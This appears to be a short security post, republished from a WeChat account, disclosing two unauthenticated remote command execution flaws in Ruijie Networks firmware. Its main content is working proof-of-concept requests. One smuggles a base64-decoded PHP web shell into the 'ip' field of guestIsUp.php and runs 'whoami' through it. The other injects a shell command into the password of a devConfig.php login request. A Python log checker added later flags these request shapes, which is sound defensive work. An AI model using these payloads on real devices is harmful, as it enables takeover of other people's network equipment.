echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K" | base64 -d

POC:

POST /guest_auth/guestIsUp.php

ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00

GET /guest_auth/poc.php?cmd=whoami

Another unauthorized RCE in the same firmware. PoC:

curl http://host/openApi/devConfig.php?a=login -X POST -d "{"admin":"admin","encry":true,"password":"1'; COMMAND ;echo 'a"}"
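
A log-side check for the two request shapes shown above, as an added example that is not part of the original post: it flags a guestIsUp.php POST whose ip is not an IP address or whose mac falls outside an assumed MAC alphabet, and a devConfig.php?a=login POST whose password carries shell metacharacters. The function name inspect, the record layout and the sample requests are constructed for illustration.

```python
import ipaddress
import json
import re
from urllib.parse import parse_qs, urlsplit

SHELL_META = re.compile(r"[|;&`$<>'\n]")         # a real password using these also alerts
MAC_CHARS = re.compile(r"[0-9A-Fa-f:.-]{1,17}")  # assumed alphabet of a legitimate mac value


def is_ip(value):
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def inspect(method, url, body=""):
    """Return a list of findings for one logged request (empty list = clean)."""
    parts = urlsplit(url)
    findings = []
    if method == "POST" and parts.path == "/guest_auth/guestIsUp.php":
        form = parse_qs(body, keep_blank_values=True)
        for ip in form.get("ip", []):
            if not is_ip(ip):
                findings.append("guestIsUp.php: ip is not an IP address")
        for mac in form.get("mac", []):
            if not MAC_CHARS.fullmatch(mac):
                findings.append("guestIsUp.php: mac has unexpected characters")
    elif (method == "POST" and parts.path == "/openApi/devConfig.php"
          and parse_qs(parts.query).get("a") == ["login"]):
        try:
            password = str(json.loads(body).get("password", ""))
        except (ValueError, AttributeError):
            password = body  # malformed JSON: scan the raw body instead
        if SHELL_META.search(password):
            findings.append("devConfig.php: shell metacharacters in password")
    return findings


# Constructed sample records (method, URL, body); not taken from real logs.
SAMPLES = [
    ("POST", "/guest_auth/guestIsUp.php", "ip=192.0.2.10&mac=00-11-22-33-44-55"),
    ("POST", "/guest_auth/guestIsUp.php", "ip=127.0.0.1|COMMAND&mac=00-00"),
    ("POST", "/openApi/devConfig.php?a=login",
     '{"admin":"admin","encry":true,"password":"S3cretPass"}'),
    ("POST", "/openApi/devConfig.php?a=login",
     '{"admin":"admin","encry":true,"password":"1\'; COMMAND ;echo \'a"}'),
]
```

Calling inspect(*record) on each entry of SAMPLES returns an empty list for the two benign records and one finding for each of the other two.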

This article was first published on the WeChat official account (Khan安全攻防实验室): Ruijie Networks RCE